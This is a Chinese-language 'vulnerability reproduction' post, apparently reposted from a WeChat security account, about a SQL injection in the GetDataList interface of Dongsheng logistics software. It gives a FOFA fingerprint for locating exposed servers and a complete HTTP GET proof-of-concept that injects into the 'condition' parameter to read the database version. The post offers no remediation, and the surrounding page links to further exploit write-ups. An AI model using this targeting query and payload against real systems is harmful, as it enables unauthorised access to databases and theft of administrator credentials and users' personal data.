【漏洞复现】东胜物流软件-GetDataList接口存在SQL注入漏洞

admin

103609
文章

87
评论

2024年2月23日20:24:47评论31 views字数 648阅读2分9秒阅读模式

漏洞描述

东胜物流软件GetDataList接口存在SQL注入漏洞，攻击者除了可以利用 SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

资产测绘

FOFA：body="CompanysAdapter.aspx"

漏洞复现

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select+%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

原文始发于微信公众号（漏洞文库）：【漏洞复现】东胜物流软件-GetDataList接口存在SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】东胜物流软件-GetDataList接口存在SQL注入漏洞

漏洞复现

CVE-2024-3806

瑞友天翼应用虚拟化系统appsaveSQL注入

漏洞情报 | 某临床浏览系统存在延时注入（Splashtop产品结尾抽奖，奖品多多~）

【未公开】H5云商城-任意文件上传-file

【漏洞通告】用友GRP-U8 /u8qx/sqcxIndex.jsp sql注入漏洞

【更新】H3C-CAS虚拟化管理系统文件上传漏洞

【未公开】电信网关配置管理系统-文件上传-rewrite

泛微OA E-Cology ln.FileDownload 文件读取漏洞

【漏洞预警】Next.js < 14.1.1 Server Actions SSRF漏洞

CVE-2024-29269 RCE漏洞（附EXP）

发表评论

在线咨询

微信